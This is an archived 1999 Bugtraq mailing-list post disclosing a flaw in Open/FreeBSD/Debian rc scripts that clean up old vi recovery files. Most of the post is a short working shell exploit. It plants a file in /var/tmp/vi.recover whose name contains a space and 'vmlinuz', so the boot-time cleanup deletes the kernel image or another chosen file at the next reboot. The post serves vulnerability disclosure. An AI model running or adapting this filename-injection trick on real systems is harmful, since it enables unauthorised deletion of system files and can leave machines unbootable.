OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Bugtraq Archives: vibackup.sh

vibackup.sh


Subject: vibackup.sh
From: Loneguard (loneguardCRAZYMONKEY.ORG)
Date: Fri Dec 31 1999 - 08:32:08 CST


Looks like someone noticed this at some point in OpenBSD. Its broken
rather than fixed ;(

#!/bin/sh
#
# vibackup.sh - Loneguard 22/05/99
# Open/FreeBSD/Debian /etc/rc script insecurely removes old vi files allowing deletion
# of files
#
touch '/var/tmp/vi.recover/vi.CrazyMonkey vmlinuz'
chmod 700 '/var/tmp/vi.recover/vi.CrazyMonkey vmlinuz'
echo Now wait for ( or cause ) a reboot...



This archive was generated by hypermail 2b27 : Fri Dec 31 1999 - 12:02:03 CST